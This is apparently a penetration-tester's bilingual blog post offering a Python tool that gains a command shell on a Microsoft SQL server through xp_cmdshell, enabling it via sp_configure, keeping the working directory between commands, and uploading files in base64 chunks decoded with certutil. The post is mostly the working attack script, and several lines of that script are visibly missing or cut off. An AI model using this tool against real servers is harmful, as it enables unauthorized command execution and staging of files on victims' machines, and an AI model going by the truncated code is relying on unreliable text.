MSSQL shell with file upload capability

MSSQL κέλυφος με δυνατότητα ανεβάσματος αρχείων

· Cybersecurity Κυβερνοασφάλεια Coding Προγραμματισμός · python python tool εργαλείο mssql mssql shell κέλυφος upload ανέβασμα

Sometimes we can get access to a Microsoft SQL server in which the execution of the xp_cmdshell stored procedure is allowed but other kind of traffic (TCP, UDP, ICMP et.c.) is blocked by some kind of firewall. This can make the acquisition of a shell more difficult. In such cases, it would be useful to have a kind of shell via multiple xp_cmdshell commands. One problem with that approach is that every xp_cmdshell command will be executed in a new context. Therefore, things like the current working directory and other environmental variables will not be preserved.

Κάποιες φορές μπορεί να έχουμε πρόσβαση σε ένα διακομιστή Microsoft SQL στον οποίο επίτρεπεται η εκτέλεση της αποθηκευμένης διαδικασίας xp_cmdshell αλλά άλλου είδους κίνηση (TCP, UDP, ICMP κ.λπ.) εμποδίζεται από κάποιους είδους τείχος προστασίας. Αυτό μπορεί να καταστήσει την απόκτηση κελύφους δυσκολότερη. Σε τέτοιες περιπτώσεις, θα ήταν χρήσιμη η ύπαρξη ενός είδους κελύφους μέσω πολλαπλών εντολών xp_cmdshell. Ένα πρόβλημα με αυτήν την προσέγγιση είναι ότι κάθε εντολή xp_cmdshell θα εκτελείται σε καινούριο πλαίσιο. Οπότε, πράγματα όπως ο τρέχων φάκελος εργασίας και άλλες μεταβλητές του περιβάλλοντος δε θα διατηρούνται.

I wrote the following Python script that stores the current working directory after every command and restores it before executing the next command. My script also features a file upload capability using multiple echo commands in order to write a base64-encoded file on the server, whereas the server-side decoding is done using the certutil tool. In addition, the script performs MD5 checksum verification for the uploaded file.

Έγραψα το παρακάτω πρόγραμμα Python που αποθηκεύει τον τρέχοντα φάκελο εργασίας μετά από κάθε εντολή και τον αποκαθιστά πριν την εκτέλεση της επόμενης εντολής. Το πρόγραμμά μου διαθέτει επίσης και δυνατότητα ανεβάσματος αρχείων κάνοντας χρήση πολλαπλών εντολών echo για την εγγραφή αρχείου με κωδικοποίηση base64 στον διακομιστή, ενώ η αποκωδικοποίηση από πλευράς διακομιστή γίνεται με τη χρήση του εργαλείου certutil. Επιπλέον, το πρόγραμμα επιτελεί και επαλήθευση υπογραφής MD5 για το ανεβασμένο αρχείο.

#!/usr/bin/env python
from __future__ import print_function
# Author: Alamot
# Use pymssql >= 1.0.3 (otherwise it doesn't work correctly)
# To upload a file, type: UPLOAD local_path remote_path
# e.g. UPLOAD myfile.txt C:\temp\myfile.txt
# If you omit the remote_path it uploads the file on the current working folder.
# Be aware that pymssql has some serious memory leak issues when the connection fails (see:
import _mssql
import base64
import shlex
import sys
import tqdm
import hashlib
from io import open
try: input = raw_input
except NameError: pass

MSSQL_USERNAME = "Domain\\sa_user"
MSSQL_PASSWORD = "**********"
BUFFER_SIZE = 5*1024

def process_result(mssql):
    username = ""
    computername = ""
    cwd = ""
    rows = list(mssql)
    for row in rows[:-3]:
        columns = list(row)
        if row[columns[-1]]:
    if len(rows) >= 3:
        (username, computername) = rows[-3][list(rows[-3])[-1]].split('|')
        cwd = rows[-2][list(rows[-3])[-1]]
    return (username.rstrip(), computername.rstrip(), cwd.rstrip())

def upload(mssql, stored_cwd, local_path, remote_path):
    print("Uploading "+local_path+" to "+remote_path)
    cmd = 'type nul > "' + remote_path + '.b64"'
    mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")

    with open(local_path, 'rb') as f:
        data =
        md5sum = hashlib.md5(data).hexdigest()
        b64enc_data = b"".join(base64.encodestring(data).split()).decode()
    print("Data length (b64-encoded): "+str(len(b64enc_data)/1024)+"KB")
    for i in tqdm.tqdm(range(0, len(b64enc_data), BUFFER_SIZE), unit_scale=BUFFER_SIZE/1024, unit="KB"):
        cmd = 'echo '+b64enc_data[i:i+BUFFER_SIZE]+' >> "' + remote_path + '.b64"'
        mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
        #print("Remaining: "+str(len(b64enc_data)-i))

    cmd = 'certutil -decode "' + remote_path + '.b64" "' + remote_path + '"'
    mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
    cmd = 'certutil -hashfile "' + remote_path + '" MD5'
    mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
    if md5sum in [row[list(row)[-1]].strip() for row in mssql if row[list(row)[-1]]]:
        print("MD5 hashes match: " + md5sum)
        print("ERROR! MD5 hashes do NOT match!")

def shell():
    mssql = None
    stored_cwd = None
        mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
        print("Successful login: "+MSSQL_USERNAME+"@"+MSSQL_SERVER)

        print("Trying to enable xp_cmdshell ...")
        mssql.execute_query("EXEC sp_configure 'show advanced options',1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell',1;RECONFIGURE")

        cmd = 'echo %username%^|%COMPUTERNAME% & cd'
        mssql.execute_query("EXEC xp_cmdshell '"+cmd+"'")
        (username, computername, cwd) = process_result(mssql)
        stored_cwd = cwd
        while True:
            cmd = input("CMD "+username+"@"+computername+" "+cwd+"> ").rstrip("\n").replace("'", "''")
            if not cmd:
                cmd = "call" # Dummy cmd command
            if cmd.lower()[0:4] == "exit":
            elif cmd[0:6] == "UPLOAD":
                upload_cmd = shlex.split(cmd, posix=False)
                if len(upload_cmd) < 3:
                    upload(mssql, stored_cwd, upload_cmd[1], stored_cwd+"\\"+upload_cmd[1])
                    upload(mssql, stored_cwd, upload_cmd[1], upload_cmd[2])
                cmd = "echo *** UPLOAD PROCEDURE FINISHED ***"
            mssql.execute_query("EXEC xp_cmdshell 'cd "+stored_cwd+" & "+cmd+" & echo %username%^|%COMPUTERNAME% & cd'")
            (username, computername, cwd) = process_result(mssql)
            stored_cwd = cwd
    except _mssql.MssqlDatabaseException as e:
        if  e.severity <= 16:
            print("MSSQL failed: "+str(e))
        if mssql:


You can download this tool from here:

Μπορείτε να κατεβάσετε αυτό το εργαλείο απο εδώ:

See also...

Δείτε επίσης...